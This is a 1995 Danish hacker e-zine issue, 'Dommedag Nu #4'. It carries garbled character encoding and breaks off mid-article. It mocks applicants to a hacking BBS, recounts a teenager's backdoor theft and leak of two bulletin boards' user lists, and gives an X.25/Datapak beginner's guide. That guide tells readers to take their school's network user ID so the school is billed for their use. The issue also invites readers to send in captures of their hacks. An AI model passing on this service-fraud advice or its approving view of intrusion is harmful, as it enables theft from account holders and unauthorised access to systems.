301603 Z SEP 1995 STARTEX Dommedag Nu #4 - SMERSH - DUMMESLAG TIL Deja-vu....... Vores 3Lit3 SYSGUD p† PLAN B har gjort det igen. Da han, som den f›rste, fik lagt sine klamme h‘nder p† en kopi af DDN#3 spredte han den som d›d og helvede, hvilket er helt fint, det var faktisk meningen, men der er bare et lille pro- blem. Problemet best†r i hans BBS add, som i dette tilf‘lde hed BEERS.EXE. Problemet med BEERS.EXE var, at den var inficeret med QuickSilver virus'en, og den blev s† spredt over det ganske land. Dette var godt nok ikke med vilje, men stadigv‘k: DUMMESLAG TIL Deja-Vu..... [Dommen udf›rt den 11/9 1995 -red]. Men nu til noget helt andet. Velkommen til Dommedag Nu #4. Jeg/vi h†ber, at i syntes om det, og spreder det som gale. Som s‘dvanligt vil vi gerne have noget "feedback" p† magasinet, og vi kan kontaktes p† PLAN B, eller p† vores 3 Dist. sites (se nedenunder). Vi har lagt m‘rke til, at folk fors›ger at komme i kon- takt med os de m‘rkeligeste steder. Vi ringer ikke meget rundt, s† her kan du f† fat p† f›lgende: Saron - Rundt omkring, men ringer med meget forskellige intervaller. Clive Sharp - H‘nger ud p† PLAN B, Darkside Connection og ingen andre steder!!! Deja-Vu - Rundt omkring, ogs† p† de fleste st›rre WaR3z boards... Narkobagmanden & 99papa er phreakere (og 3LiTe trashere (hmmm)) som ikke ringer rundt, men de kan, hvis i vil snakke med dem, kontaktes gennem Saron, Clive Sharp & Deja-Vu. Vi mangler, som s‘dvanligt, noget materiale som vi kan smide i bladet, s† hvis du har noget du mener der er interesseant, smid det op til os. ALT har inter- esse, men vi kan ikke garantere at det kommer med i bladet. Jo mere teknisk det er, jo bedre, men det er bestemt ikke noget krav, s† hvis du har en capture fra dit sidste hack, eller noget andet i den genre, upload det til os (men s›rg for at det ikke er FOR "belastende"). Nok fra mig, mu skal du bare nyde bladet.... - Clive Sharp Medvirkende: De 7 p† toppen: Redakt›r............... Pat Bateman Eksklusiv skribent..... Saron KTAS h‘vneren.......... Clive Sharp L‘rlingen.............. Narkobagmanden Helten................. 99papa Den onde............... Darkseed Logistik: SYSGUD................. Deja-vu PLAN B................. 31220506 UAFD: Darkside Connection.... 45974344 Alien Staircase........ 31575188 Restricted Access...... 36703060 Og det l›se: Tak til................ Darkman , TorNado & Solaris Farve af............... QEdit Advanced V3.00c SW Tryk af................ Cannon LBP-4 Lagerplads............. Western Digital Outside Broadcasting... Zitech 486/66 b‘rbar Motorola Lyd.................... GravisUltraSound MAX Musik.................. Frontline Assembly Vi anbefaler........... BOMBJACK Indholdsfortegnelse: 1. Livet p† PLAN-B. 2. Saga'en om Junker Jake. 3. X.25 for begyndere. 4. AT&T - En global organisation. 5. En Polymorphic Virus. 6. Hvad vil fremtiden bringe for Dommedag Nu? 7. CyberBug v. 1.00 Nyheder (taget, stort set, fra den Danske dagspresse). Hackere Bustet! Hackere anholdt. [Fra Ekstra-Bladet (suk!).] R†d til Danske sysopper og brugerne af deres systemer. Dansk Piratlinie oprettet. [Jyllands-Posten.] Sv‘re tider for hackere. [ComputerWorld.] Hackere ringer verden rundt p† andres Visa Dankort. [ComputerWorld.] Se hackerens telefonnummer. [ComputerWorld.] Sikkerhedshul i Netscape. [ComputerWorld]. þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ Livet p† PLAN-B (Uden synd ingen frelse) Af Clive Sharp & Deja-vu 1. Indledning Efter vi bragte nummeret til PLAN-B i Dommedag Nu nr. 3, har vi f†et en masse henvendelser. Mange af dem er fra folk der ved hvad de snakker om, men desv‘rre er der ogs† en masse folk, som INTET ved om hacking. Dette er jo ikke nogen synd, da vi alle skal starte fra et sted. Problemet er, at der er FOR mange, der slet ikke har noget grundlag for at begynde at hacke. Det mest ide- elle ville v‘re, at vi lod alle komme ind p† boardet, men det ville give os (is‘r Deja-Vu) en uoverskuelig arbejdsopgave. S† for at skille de vidende fra de "uvidende" har vi installeret nogle "sp›rgeskemaer" n†r man s›ger om optag- else som ny bruger. Disse "sp›rgeskemaer" har v‘ret grundlag for mange timers sjov, og nu vil vi dele disse sjove oplevelser med alle jer. Bem‘rk venligst, at alle disse svar er givet i FULDT ALVOR, hvilket g›r det ret sjovt. Alle navne er blevet slettet, da vi ikke ›nsker at h‘nge nogen ud. Alt i [] er vores kommentarer. N†, men lad os komme i gang. 2. PLAN B registering - Hacking Hvor ligger de priviligerede porte p† TCP/IP: þ Til venstre!?! [HVAD?!? Har du r›get???] Hvad er Telnet port 25 og 79: þ X.25 og X.79 [N‘ppe.] þ Tele port 25 of 79. [Hvad ????] Hvad er X.25: þ Telenet standart. [Nope.] þ Netw‘rk. [T‘t p†, men ikke helt korrekt....] þ NUA connection (datapak). [hmmmmm...] Hvad er .RHOSTS: þ Telenet standart. [Nej......] Hvad er en PAD: þ Et tastatur. [Man tror det er l›gn.] þ Password active destroyer. [Hvad er det?????] Hvad er COPS: þ Fedz. [Hvor dum kan man v‘re...] þ Bad ones. [Ditto.] þ Politi betjent. [Ditto.] þ Politi??? [Ditto.] þ Politi. [Ditto.] þ En sysop. [Ok, m†ske er der en sysop der hedder COPS, men tror du det er ham der bliver spurgt efter???] þ Et program p† TV VestKysten [!!!!!] Hvad er SATAN: þ Div evil. [?!?!?!?] Hvad er ideen bag en FIREWALL: þ To protect system. [Det skal nok uddybes lidt..] þ Man kan komme ind igen. [S† starter vi forfra igen.] þ At beskytte sig. [Godt g‘ttet.] Hvad er en NUI: [Dette svarer de fleste rigtigt p†.] Hvad er RSH: [Dette svare de f‘rreste p†.] Hvad er Crackerjack: þ Et program. [Fedt....] þ Hacker program. [Uddybes tak....] þ Online password cracker. [Ikke helt....] Hvad er CERT: þ Hacker group. [Super lamerzz....] þ En hacker gruppe. [Ditto.] þ Hacker gruppe. [Ditto] Hvem er CERT's Danske medlem: [Kun 1 har svaret p† dette.] Hvad er/var QSD: þ D›dt. [hmmmmm.] þ Et board. [Ikke helt rigtigt.] Hvordan bruge man ICMP beskeder til egen fordel: þ Well, send and recieve. [Hvad?!?!?] þ L‘se dem. [Hvad ?!?!?!?] Hvordan virker en ETHERNET SNIFFER: þ Cops. [!?!?!?!] þ Samler password. [Og hvad mere.....] Hvad er nemt hvis TFTP er sat d†rligt op: þ Hack. [Godt t‘nkt..., men m†ske lidt mere pr‘cist.] þ At hacke sig ind. [Ditto.] þ Hacke sig ind. [Ditto.] þ At hacke shit'et. [Ditto.] þ Hente filer der ikke er tilg‘ngelige. [Ditto.] Hvad er en GOD/OD: þ Ahmm Think it is a Sysop. [Det er n‘ppe det der bliver t‘nkt p† i et hacking "sp›rgeskema", vel???]. þ Sysop. [Ditto]. 3. PLAN B registrering - Phreaking Hvilke Numrer BlueBoxer man altid over: [Ganske f† svarer p† dette.] Hvad er teorien bag BlueBoxing: þ At ringe gratis. [M†ske lidt mere specifikt.] þ At skabe frit lejde gennem nettet. [Frit lejde???] þ At udsende en tone der forvirer systemet. [Nej..] þ No pay (for da phreaker). [Godt t‘nkt..] þ Hmm bb er det ikke det med lyd Hz. [Det er det nemlig..] þ Ja man bruger en frekvens til at snyde tlf. [Nej nu bliver det for teknisk...] þ erhm PBX??? [B†tnakke]. Hvad er CCCIT 5: þ Nogle seje gutter. [Tror han, at det er en gruppe?????] þ Calling card. [Nej....] þ Modem standart. [Hmmm, nope..] Hvad er en PBX: þ Dialout site. [Hmmm.] þ Power box. [Hvad er det???] þ Et sted som du ringer videre fra. [uhhh....] Hvad er "Alliance conf.": þ Phreaking. [Ikke just.] þ A friendly one. [Hvad?!?!?!] 4. PLAN B registrering - Virus Hvad er VCL: þ Virus Clean. [N‘ppe.] þ Program. [Godt g‘ttet.] þ Virtuelt Clear Lockout. [Hvad?!?!?!] Hvor'n virker en Polymorphic virus: þ del‘ggende. [NNEEEJJJJ.] þ Formaterer din HD. [Ditto.] Hvem er Dark Avenger: þ Frygtet. [Fedt...] þ Hvis med i PWA... [Super Lamer!!] þ Virus program. [Nej, nej, nej.] þ En skummel fyr. [Fedt, og hvad mere???] þ En Virus. [Nej.] Hvad er 40HEX: þ Ahmm.. Hex er hexa decimaler. [Det er n‘ppe det der bliver spurgt om i et Virus area, vel??] þ Langues. [?!?!?!?] þ Program-tal. [Fedt!!] þ Som related stuff.. [Godt g‘ttet.] þ En virus. [Nej.] þ The magic number of kilobytes a com file kan be. [Det er n‘ppe det der bliver spurgt efter.] 5. "Brevet" Man skal nu ikke tro, at "sp›rgeskemaerne" er det eneste vi bruger til at vurderer en ny bruger, for det er det ikke. Vi har brugere, der ikke har svaret p† et eneste sp›rgsm†l, og grunden hertil er, at hvis man har den rette indstilling, s† kan man sagtens komme ind, selvom at man ikke har den helt store viden om hacking. Herefter f›lger nogle af de breve vi har modtaget, fra nye brugere. F‘lles for alle disse breve er: 1. Ingen af dem havde udfyldt et rimeligt antal sp›rgsm†l (eller bare et!), og 2. ganske f† kom ind p† boardet (i s† tilf‘lde er de medtaget her, pga. deres mere eller mindre morsomme breve). 6. Hvad De skrev þ Well I'll leave this shit up to you. þ jeg h†ber at vi kan udveksle mange gode crack's og warez programmer. jeg har bland andete qmodem pro 2.0 for win95, norton navigator for win95, windowscommander v1.61 *cracked* m.m. please upgrade me! [Er du sikker p†, at du har ringet det rigtige sted hen??? Det er vi IKKE!] þ you need me!!!! þ Ahm... Jeg er Faktsik Kun Elite... Ikke rigtig noget inden for Virus eller hacking eller Phreak... SO... H†ber jeg kommer ind... [3LiTe den her!!!] þ Ahm... I HATE VIUS :) [I hate jou :) ] Na... Jeg er kun en lille pirat Hacker ikke phreaker... OG coder heller ikke virussersss SEEEEES [yeps.. netop] þ HVORFOR?????????????????????? Hvorfor er jeg ikke kommet ind igen??????? Jeg var p† DL-top10'en!!!!!!!! [!!!] Jeg skrev meget!!!!!!!!!!!!!!! [Kvalitet frem for kvantitet!] Hvad nu??? Hvad vil du ha'??????? PLEASE LET ME IN!!!!!!!!!!!!!!!! þ Hi.. Tjjaa.. jeg jan sikkert svarre p† nogle af de sp›rsm†l. men det er ville sikkert ikke v‘re rigtigt alligevel... Det eneste jeg er interseret i er at Trade og Warez... s† jeg t‘nkte at dette BBS ville v‘re som skabt for mig for at f† nye MCI med mere.. Cya Later... [Vi HaR De$\/‘Rr3 ikk3 MCi'$ p B0aRd3t] þ jeg ›nsker bare access til hacking program [Maj mange hacking program har, dig ingen adgang!!] þ SOM DU KAN SE ER JEG NEW USER OG OENSKER AXX PAA BOARDET. DA DU HAR LAEST MIN REGISTRERING KAN DU SE AT JEG IKKE VED MEGET OM H/P/A I DET HELE TAGET MEN DET ER NETOP OGSAA GRUNDEN TIL AT JEG OENSKER AXX, FOR AT LAERE OM DET SAA JEG KAN BLIVE BEDRE. DERFOR HAABER JEG AT DU VIL GRANETE AXX TIL MIG. [Sl† lamer tasten fra!] þ Well, I stink can't help it, det er anden gang jeg har fyldt ud, saa denne bliver vel ligesaa daarlig som den foerste - aergeligt.. Well, Glad to stop by anyway. [Tredie gang er lykkens gang!] þ Hej Med dig. Hvad fanden er det for nogle †ndsvage sp›rgsm†l? Jeg troede jeg havde fundet en varm hacker bbs og s† havner jeg i lykkehjulet har jeg vundet noget? þ hi deja-vu im sure i've seen you before he he im not no elite and im sure not an enclypidia im afraid i could not answer any of your ? maybe the 40hex if i calculatet i little bit but i dont think that it would matter much anyway im sure XXXXXXXX [Slettet -red] will say ok for me im uuping and downing some warez sometimes well thats about it i guess. [N†r man pr›ver at omregne 40h til decimal (og s† p† det eneste sp›rgsm†l man besvarer), og ikke engang kan det, S ER MAN PRESSET I BUND!!] þ Hi there.. Kunne jeg komme ind her... or.. ? þ hejsa jeg h†ber at jeg f†r access, da jeg er MEGET interassede i at f† nogle nye spil & progs..... [Nej men du kan ringe til DanBBS og sp›rg om du ikke kan blive opgraderet til Elite Pirat Bruger!] þ Give me access_! [Sut mig!] 7. Et sidste ord Nogle vil m†ske syntes, at vi er temmeligt arrogante, og at vi ikke kan tillade os, at h‘nge folk p† denne m†de. Til det vil svaret v‘re: N†r man har ca. 1-2 nye brugere om dagen, s† bliver man temmeligt tr‘t af, at se p† folk som ikke kan/gider at udfylde vores "sp›rgeskemaer", og n†r der nu engang imel- lem kommer en rigtig WaR3z gut forbi, s† m† man sku' da kunne lave lidt sjovt med dem, det er jo ikke kun fuldt alvor. Under alle omst‘ndigheder, s† h†ber vi, at denne artikel har v‘ret lige s† sjov at l‘se, som den var at lave. þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ Saga'en Om Junker Jake ------------------------ - Darkseed Alt er blevet sagt, og alt bliver sagt, men hvad var grunden til at en dreng p† 14 †r kom ind, og hvad kom og kommer det til at betyde. En lille ubetydelig "jeg er intet" fyr, havde tilf‘ldigvis p† ukendt m†de, fundet ud af, at der var en backdoor i Vigilantes S-Logon Utility til PCboard der gav mere eller mindre access til at kunne fx. hente et boards Userliste, s† han gav sig UDEN at t‘nke, igang med 2 boards (Dyers Eve samt Travelogue) som han s† fik deres Userlister ud af, lidt tid gik s†, hvor Junker Jake s† misbrugte nogle forskellige accounts, downloadede osv. Nu gik det f›rst galt, Junker Jake releasede nu de 2 Userlister over mange Elite boards, der derefter fik tr‘dem›llen til at tr‘de rundt, medf›lgene i arkivet var f›lgene tekst fra Junker Jake.: Yo!, Her er en besked til alle i denne skide lamme "scene" kaldet dk : %\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\ Efter at have blevet taget i farten med at have det sjovt, har jeg besluttet mig at stoppe i scenen nu. Den rigtige historie er nok at jeg hackede nogle Boards, folk blev sure, selv om jeg ikke gjorde nogen skade. Udover at misbruge deres accounts for at downloade. S† det var det, jeg stopper! Det var meget sjovt og jeg putter det hele bag mig nu, og f†r et liv uden Teledanmarks telefonregning. Jeg vil bare sige tak til alle de mennesker jeg har chattet mig, tradet osv. Og jeg er specielt ked af at misbruge Bionics account, men det var meget sjovt p† Velvet Underground :) tja jeg er ked af det, men det er jo hvad der sker. Men ok alt hvad jeg fik ud af det var nogle chips, lidt Cola, nogle Userlists osv. Jeg er totalt ligeglad, med de Userlists, s† her er de :) jeg r†der alle der er listet i disse Lister, at ‘ndre deres Passwords, Tlf.nummere osv. %\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\ Ses, Junker Jake / =[>ALPHA FLiGHT<]= En ting som Junker Jake skrive, som jeg bed m‘rke i f›rst, var s‘tningen > Men det er jo hvad der sker. Jeg vil efter sk›n sige at dette ikke er hvad der sker, da selve "scenen" ikke er interesseret i at skade sig selv. Det har hidtid ikke v‘ret et problem, men en stadig stigene m‘ngde af "unge" folk ses stadig at komme ind i scenen - Disse mennesker eller b›rn, har ingen efaring, og kender ikke de (U)-skrevne love i scenen, ganske simpelt fordi de ikke har v‘ret l‘nge nok i scenen til at kunne l‘re det - Men stadig er det ingen undskyldning, overhovedet ikke, for de burde ikke v‘re her, medmindre de er helt indforst†et med hvad den s†kaldte "scene" er for noget...... Men tilbage til emnet. Efter filerne var blevet spredet godt rundt, begynder det f›rst at se sort ud for Junker Jake, alle flamede ham (og g›r det stadig), nogle folk har v‘ret ude p† hans private adresse for at l‘re ham ordet "VOLD", dette mislykkes da han ikke var hjemme, men en seddel var blevet lagt til ham, og Junker Jake skyndte sig s† at ringe til en af dem, hvorefter han fik en telefon-svarer, det sagde Junker Jake s† at han havde h›rt at nogle havde v‘ret ude hos ham for at banke ham, og han var ked af det, samt at han havde smidt Userlisterne v‘k igen.. [Denne sampel ligger ogs† i Zip filen, samt en player -red]. Dette hjalp dog ikke, en anden person ringede til Junker Jake for at tale med ham, hvorefter han br›d sammen og gr‘d - efter ca. 1000 t†rer tilb›d han s† at betale for en ny oprettelse af en linie, samt nogle andre ting. ----- Indtil dette har det v‘ret temmelig umuligt, for PHG (Politiets Hacker Gruppe) at ramme scenen, men efter Pharzyde Bust, begynder de sorte tider at kikke frem, politiet har, som skrevet i en anden artikel, alle stederne hvor Pharzyde har ringet hen - Og af en af mine p†lidlige kilder har jeg f†et at vide at "Travelogue" allerede er lukket. Jeg vil liges† r†de folk der er i "scenen" at de passer lidt p† med hvad de g›r i det n‘ste stykke tid, da "scenen" ikke er s† sikker som den har v‘ret. Vi skal selvf›lgelig huske at takke Junker Jake for at der nok kommer mange Busts i denne tid.... þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ X.25 for begyndere Af Clive Sharp 1. Hvad er X.25 X.25 er i Danmark ogs† kendt som Datapak, og er en internationalt netv‘rk, som var et af de st›rste netv‘rk inden Internettet blev trendy. Det er forbundet med mange andre mere eller mindre bizarre netv‘rk i rigtigt mange lande, og som eksempler kan n‘vnes SprintNet, TymNet o.s.v. Der findes GateWays p† X.25, dvs. at man kan f.eks. komme p† Internettet ved at k›re gennem X.25. Man kan selvf›lgeligt ogs† bare hacke en maskine p† X.25, der har forbindelse til Internettet, og s† k›re gennem der. Men den bedste ting ved X.25 er: DET ER GRATIS AT RINGE TIL!!!!! 2. Historien bag X.25 (MEGET KORT) Den teknologi der bruges p† X.25 idag stammer, i bund og grund, fra 1968, hvor ARPANET kom op at k›re. Ide‚n bag X.25 er Packet Switching, som er bygget op p† denne m†de (MEGET forenklet): þ Al data bliver sendt i pakker, som er opbygget p† denne m†de: þ Pakken har ‚n bestemt l‘ngde. þ Pakken har adressen p† modtageren (logisk nok). þ Pakken har et nummer, s† man kan bestemme r‘kkef›lgen hos modtageren (de ville nok ikke v‘re s† smart, hvis pakkerne kom p† denne m†de: 1,3,2,4,6,9,111,10 o.s.v, det er selvf›lgeligt et krav, at pakkerne kommer som: 1,2,3,4,5,6,7,8,9,10 o.s.v.). Stedet hvor al data'en bliver delt op i pakker (og sat sammen i pakker) er en PAD. PAD betyder Packet Assembler/Disassembler, og det er den man logger ind p† i vores tilf‘lde. 3. Hvordan logger man p† For at logge p† skal du g›re f›lgende: þ Ring 171 (Det er gratis!!) þ N†r du har f†et en connect, s† sker der ikke noget... Du skal nu trykke : go (uden return). þ P† sk‘rmen st†r der nu: DATAPAK X.28 SERVICE PAD-ID : HIPC_ PORT-NO : 28 ENTER NUI -> Her begynder det at blive sp‘ndende. De f›rste 3 linier har ikke den store interesse i vores tilf‘lde (grunden til at der st†r X.28 er, at X.28 er den protokol som bruges mellem terminalen og PAD'en, mens X.25 er den protokol som bruges til kommunikation "internt" p† nettet) men den sidste linie er enormt interesseant. Da jeg sagde, at det var gratis at bruge X.25 l›j jeg lidt. Det er gratis at ringe op, men s† skal man opgive et nummer, hvor ens forbrug skal krediteres. Dvs. at den person/firma hvis nummer man bruger f†r regningen (temmeligt fikst, ikke sandt ?!). Et s†danne nummer hedder en NUI, Network User Id, og er opbygget p† denne m†de: þ XYYYYYYYZZZZZZZZ X= Et bogstav, bestemt af TeleDanmark. Y= Nogle tal, bestemt af TeleDanmark. Z= Tal eller bogstaver, bestemt af kunden. Hvis du s† har indtastet en gyldig NUI i linie 4 (se ovenover), frem- kommer en [*], og s† er du parat til at g† amok p† nettet. Men lad nu v‘re med at sidde og pr›ve at "g‘tte" en NUI, for det VIL blive opdaget af TeleDanmark. Istedet s† check din skoles computer (forudsat at du g†r i skole), for der er temmelig stor sandsynlighed for, at skolen har Datapak adgang, og s† kan du jo bare lade skolen betale dine "udflugter" :). 4. Simple funktioner Men f›r du kan begynde dit super-vilde-hacker-g†-amok-trip p† nettet, s† skal du lige vide lidt mere om hvordan det virker. Det f›rste du skal vide noget om, er en(et??) NUA. NUA betyder Network User Address, og er bygget op p† denne m†de: þ 023421920100401 ³³ ³³ ³³ ³ ³ÀÂÄÙÀÄÂÄÙÀÄÂÄÙ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄ Netv‘rk adresse (variabel l‘ngde, men ³ ³ ³ standarten er 5 eller 3). ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Omr†de pr‘fix (l‘ngden ligger, s†vidt ³ ³ jeg ved, fast p† 5). ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ DNIC (Data Network Identification Code) ³ L‘ngden ligger fast p† 4. DNIC bruges ³ til at identificere hvilket netw‘rk man ³ er p†, og hvilket land det ligger i. ³ Se punkt 6. ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 0 bruges hvis man ringer til en NUA der ligger i samme land, som den PAD man bruger, hvis man ringer udenlands, skal man bruge 9 istedet. Der findes en masse dejlige funktioner p† Datapak, men her vil jeg nu kun gennemg† en, nemlig CON. CON bruges til at f† forbindelse til en anden com- puter p† nettet (CONnect). Dvs. at hvis jeg vil i forbindelse med en computer med NUA'en 23421920100401, s† skal jeg skrive: þ *con 923421920100401 ³³ ³ ³³ ³ ³ÀÂÙ ³ÀÄÄÄÄÄÂÄÄÄÄÄÄÙ ³ ³ ³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄ Vores NUA. ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 9 fordi vi ringer udenlands. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Vores CONnect kommando. ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Datapac er parat. S† vil Datapac svare med at gentage linien (uden *), og efter et par sekunder skulle man kunne se: Login (eller hvad man nu har f†et fat i). Det skal dog lige n‘vnes, at man ikke beh›ver at skrive con, da dette vil udf›re pr‘cis samme job: *923421920100401. Overst†ende NUA er forresten noget der hedder CAMPUS 2000, og det er et slags chat system for skoler o.s.v. Personligt syntes jeg, at det er noget ‘kelt skod, men s†dan er der s† meget.... 5. Menu'en Men Datapak har ogs† en menu, som man kan lege rundt med. For at komme "ind" i menuen skal man bare skrive (n†r "*" er der): menu. S† kommer man ind i PAXNET PUBLIC PAD COMMAND MENU. Jeg vil ikke gennemg† menuen, da den er temme- ligt selvforklarende, dog skal der lyde en lille advarsel fra mig: Pas p† med at rode ved ting du ikke kender noget til! Der er muligheder nok til at du kan br‘nde dine fingre, med det resultat, at din NUI lider en brat d›d.... Men hvis du absolut vil rode med den slags ting, s† pr›v at tast "?" (n†r "*" er der), s† f†r du nogle settings du kan lege med. Personligt kan jeg ikke bruge dem til noget, men m†ske kan du. 6. Hvilket land/netw‘rk er det? F›lgende liste er stj†let fra The Dark Council's tekst om DataPAC (brugt i: The Canadian Hacker's Bibel). Listen er rimeligt gammel (omkring 1990) s† den er IKKE komplet, men jeg har ikke set nogle nyere update's, s† det er hvad i f†r. þ Land Netv‘rk's Navn DNIC ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Andora ANDORPAC 2945 Antigua AGANET 3443 Argentina ARPAC 7220 ARPAC 7222 strig DATEX-P 2322 DATEX-P TTX 2323 RA 2329 Australien AUSTPAC 5052 OTC DATA ACCESS 5053 AUSTPAC 5054 Bahamas BATELCO 3640 Bahrain BAHNET 4263 Barbados IDAS 3423 Belgien DCS 2062 DCS 2068 DCS 2069 Bermuda BERMUDANET 3503 Brasilien INTERDATA 7240 RENPAC 7241 RENPAC 7248 RENPAC 7249 Cameroon CAMPAC 6242 Cayman ›erne IDAS 3463 Chad CHAD 6222 Chile ENTEL 7302 CHILE-PAC 7303 VTRNET 7305 ENTEL 7300 Kina PTELCOM 4600 Colombia COLDAPAQ 7322 Costa Rica RACSAPAC 7120 RACSAPAC 7122 RACSAPAC 7128 RACSAPAC 7129 Cypern CYTAPAC 2802 CYTAPAC 2807 CYTAPAC 2808 CYTAPAC 2809 Danmark DATAPAK 2382 DATAPAK 2383 Djibouti STIPAC 6382 Dom. rep. UDTS-I 3701 Egypten ARENTO 6020 Finland DATAPAK 2441 DATAPAK 2442 DIGIPAK 2443 Frankrig TRANSPAC 2080 NTI 2081 TRANSPAC 2089 TRANSPAC 9330 TRANSPAC 9331 TRANSPAC 9332 TRANSPAC 9333 TRANSPAC 9334 TRANSPAC 9335 TRANSPAC 9336 TRANSPAC 9337 TRANSPAC 9338 TRANSPAC 9339 Fr. Antiller TRANSPAC 2080 Fr. guiana TRANSPAC 2080 Fr. Polynesien TOMPAC 5470 Gabon GABONPAC 6282 Tyskland DATEX-P 2624 DATEX-C 2627 Gr‘kenland HELPAK 2022 HELLASPAC 2023 Gr›nland KANUPAX 2901 Guam LSDS-RCA 5350 PACNET 5351 Guetamala GUATEL 7040 GUATEL 7043 Hondura HONDUTEL 7080 HONDUTEL 7082 HONDUTEL 7089 Hong Kong INTELPAK 4542 DATAPAK 4545 INET HK 4546 Ungarn DATEX-P 2160 DATEX-P 2161 Island ICEPAK 2740 Indien GPSS 4042 Indonesien SKDP 5101 Ireland EIRPAC 2721 EIRPAC 2724 Israel ISRANET 4251 Italien DARDO 2222 ITAPAC 2227 Elfenbens kyst. SYTRANPAC 6122 Jamaica JAMINTEL 3380 Japan GLOBALNET 4400 DDX 4401 NIS-NET 4406 VENUS-P 4408 VENUS-P 9955 VENUS-C 4409 Korea Rep. DACOM-NET 4501 DNS 4503 Kuwait BAHNET 4263 Libanon SODETEL 4155 Luxenbourg LUXPAC 2704 LUXPAC 2709 Macau MACAUPAC 4550 Maylasia MAYPAC 5021 Mauritius MAURIDATA 6170 Mexico TELEPAC 3340 Morokko MOROCCO 6040 Holland DATANET-1 2040 DATANET-1 2041 DABAS 2044 DATANET-1 2049 N. Mariana PACNET 5351 New Caledonia TOMPAC 5460 New Zealand PACNET 5301 Niger NIGERPAC 6142 Norge DATAPAC TTX 2421 DATAPAK 2422 DATAPAC 2423 Panama INTELPAQ 7141 INTELPAQ 7142 Peru DICOTEL 7160 Philipinerne CAPWIRE 5150 CAPWIRE 5151 PGC 5152 GMCR 5154 ETPI 5156 Portugal TELEPAC 2680 SABD 2682 Puerto Rico UDTS 3300 UDTS 3301 Qatar DOHPAC 4271 Reunion (Fr.) TRANSPAC 2080 Rwanda RWANDA 6352 San Marino X-NET 2922 Saudi Arabien ALWASEED 4201 Senegal SENPAC 6081 Singapore TELEPAC 5252 TELEPAC 5258 Syd Afrika SAPONET 6550 SAPONET 6551 SAPONET 6559 Spanien TIDA 2141 IBERPAC 2145 Sverige DATAPAK TTX 2401 DATAPAK-1 2402 DATAPAK-2 2403 Schweitz TELEPAC 2284 TELEPAC 2289 Taiwan PACNET 4872 PACNET 4873 UDAS 4877 Thailand THAIPAC 5200 IDAR 5201 Togolese Rep. TOGOPAC 6152 Tortola IDAS 3483 Trinidad DATANETT 3745 TEXTET 3740 Tunesien RED25 6050 Tyrkiet TURPAC 2862 TURPAC 2863 IDAS 3763 Foren. arabiske.EMDAN 4241 EMDAN 4243 TEDAS 4310 Uruguay URUPAC 7482 URUPAC 7489 Rusland IASNET 2502 Jomfru erne UDTS 3320 England IPSS-BTI 2341 PSS-BT 2342 MERCURY 2350 MERCURY 2351 HULL 2352 Jugoslavien YUGOPAC 2201 (N’PPE OPPE!!!) Zimbabwe ZIMNET 6482 7. Konklusion Jeg h†ber, at denne artikel har hjulpet dem af jer, som ikke vidste hvad Datapak var. Alle dem der har v‘ret p† Datapak f›r har sikkert ikke f†et noget ud af denne tekst, men det var nu heller ikke meningen. Hvis i finder nogle fejl (dem er der sikkert et par stykker af), s† l‘g post til mig p† PLAN B, hvilket (stort set) er det eneste sted jeg "kommer" ( ÄÄ hmmmm)....... þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ AT&T - EN GLOBAL ORGANISATION ------------------------------- - Darkseed AT&T betyder for mange kommunikation, og i stort omfang er dette ogs† rigtigt, men hvad er en eventuel konsekvens af en verdensomsp‘ndt koncern, der med tiden bliver st›rre og st›rre - Hvilken effekt kan det f† vis kun en koncern f†r tilstr‘kkelig magt, til at styre hele jordens kommunikations-net. Som s† mange har lagt m‘rke til, g‘lder f›lgene regel : 'DEN DER KONTROLLERE KOMMUNIKATIONEN KONTROLLERE VERDEN'.. AT&T's f›rste bygning ligger tilbage til 1882, hvor de †bnede en afdeling i Antwerp, Belgien, hvorefter de brugte de n‘ste 40 †r med at †bne afdelinger og l‘gge telefon-linier ud i Europa, Asien samt Afrika. Allerede dengang blev det besluttet at de ikke skulle have for meget magt, s† i 1925 solgte de deres fremstilling af telefoner til andre lande (ITT-System), Hvor AT&T s† rettere deres interesse for den Universale telefon service i USA, men forsatte dog stadig deres lang-distance service, til andre lande, hvorefter de i 70'eren fornyede deres internationale aktiviteter - i 1980, annonceret AT&T s† igen at de ville g† igang igen med styring af den globale verdens kommunikation. Tilbage i 1991 fik AT&T 24% af deres inkomst fra det internationale marked, hvilket de dengang sp†ede til at i †r 2000, ville det v‘re oppe p† 50 %. AT&T har ogs† gjort store fremskridt indenfor teleudstyr - AT&T har via deres AT&T Microelektronik produceret over 40 forskellige AT&T produkter designet for brugerens benyttelse, s†som tr†dl›se samt ledning-telefoner, samt telefon- svarer, der bliver exporteret til hele 24 lande, samt EDB-l›sninger til s†vel sm† som st›rre virksomheder, som ligger b†de i alm. systemmet samt PBX- systemmer der er blevet solgt til over 45 lande. AT&T har 50 distribut›rer over hele jorden, hvor AT&T Microelektronik har et netv‘rk med 15 salgs- og teknisk marketing kontorer. AT&T EasyLink er ogs† blevet sat i kraft med elektronisk beskeder der rykker rundt i hele verden, samt med Telex-systemmer, sat op over hele kloden, for absolut kommunikation. AT&T INFORMATIONER - i 1991 havde AT&T over 50,000 ansat udenfor deres kontor i USA.. þ AT&T er aktive i omkring 100 lande rundt om jorden, og laver forretninger i 120. þ AT&T har 